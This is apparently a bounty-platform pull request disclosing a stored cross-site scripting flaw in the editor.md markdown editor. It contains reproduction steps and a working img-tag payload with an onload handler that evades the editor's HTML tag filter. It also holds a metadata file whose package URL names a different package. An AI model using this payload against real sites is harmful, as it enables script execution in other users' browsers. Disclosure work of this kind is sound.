### PR TITLE
Report XSS in pandao using self closing tags

### DIFF
--- a/bounties/npm/editor.md/1/README.md
+++ b/bounties/npm/editor.md/1/README.md
@@ -1,0 +1,40 @@
+# Description
+
+I would like to report XSS vulnerability in pandao/editor.md
+Implemented Html tag filtering doesn't work for self clossing tags, leading to posible code injection on this elements
+
+# Module
+module name: Editor.md
+version: all versions
+
+# Module Description
+
+Editor.md : The open source embeddable online markdown editor (component), based on CodeMirror & jQuery & Marked.
+
+# Weekly Downloads
+
+1,417
+
+# Vulnerability Description
+
+XSS in editor.md is avoided by using filterHTMLTags which uses a RegExp to replace possible dangerous content, unfortunetly the RegExp doesn't handle self clossing tags, making it possible to execute code
+
+
+# POC
+
+Insert in editor a self clossing element with event to execute code
+
+  1. Download editor.md 
+    `git clone https://github.com/pandao/editor.md`
+  2. Go into directory
+    `cd editor.md` 
+  3. Make the content available with any web server
+    `php -S localhost:8080`
+  4. open http://localhost:8080/examples/html-tags-decode.html
+  5. Filter code execution by clicking on Filter style,script,iframe|onclick,title,onmouseover,onmouseout,style
+     (No code should be executed with this Filter)
+  2. Insert element with payload usig the editor: 
+     `<img src="https://picsum.photos/200" style="position:fixed;left:0;top:0;width:10000px;height:10000px;" style="z-index:3000" onload="alert('img execution...')"/>`
+
+# Impact
+This could have enabled an attacker to execute code remotely if the content of the editor is saved and then retrieved by some other user

--- a/bounties/npm/editor.md/1/vulnerability.json
+++ b/bounties/npm/editor.md/1/vulnerability.json
@@ -1,0 +1,57 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-09-30",
+    "AffectedVersionRange": "*",
+    "Summary": "Cross-site Scripting (XSS)",
+    "Contributor": {
+        "Discloser": "alromh87",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "editor.md",
+        "URL": "https://www.npmjs.com/package/superstatic",
+        "Downloads": "1,417"
+    },
+    "CWEs": [
+        {
+            "ID": "725",
+            "Description": "Cross-Site Scripting (XSS)"
+        }
+    ],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "",
+        "AC": "",
+        "PR": "",
+        "UI": "",
+        "S": "",
+        "C": "",
+        "I": "",
+        "A": "",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.4"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/pandao/editor.md",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "pandao",
+        "Name": "editor.md"
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [
+        {
+            "Description": "",
+            "URL": ""
+        }
+    ]
+}


### PR DESCRIPTION
# Description

I would like to report XSS vulnerability in pandao/editor.md
Implemented Html tag filtering doesn't work for self clossing tags, leading to posible code injection on this elements

# Module
module name: Editor.md
version: all versions

# Module Description

Editor.md : The open source embeddable online markdown editor (component), based on CodeMirror & jQuery & Marked.

# Weekly Downloads

1,417

# Vulnerability Description

XSS in editor.md is avoided by using filterHTMLTags which uses a RegExp to replace possible dangerous content, unfortunetly the RegExp doesn't handle self clossing tags, making it possible to execute code


# POC

Insert in editor a self clossing element with event to execute code

  1. Download editor.md
    `git clone https://github.com/pandao/editor.md`
  2. Go into directory
    `cd editor.md`
  3. Make the content available with any web server
    `php -S localhost:8080`
  4. open http://localhost:8080/examples/html-tags-decode.html
  5. Filter code execution by clicking on Filter style,script,iframe|onclick,title,onmouseover,onmouseout,style
     (No code should be executed with this Filter)
  2. Insert element with payload usig the editor:
     `<img src="https://picsum.photos/200" style="position:fixed;left:0;top:0;width:10000px;height:10000px;" style="z-index:3000" onload="alert('img execution...')"/>`

![Captura de pantalla de 2020-08-30 21-13-30](https://user-images.githubusercontent.com/7505980/91666486-bf981380-eb05-11ea-874d-85728e3b591c.png)


# Impact
This could enable an attacker to execute code remotely if the content of the editor is saved and then retrieved by some other user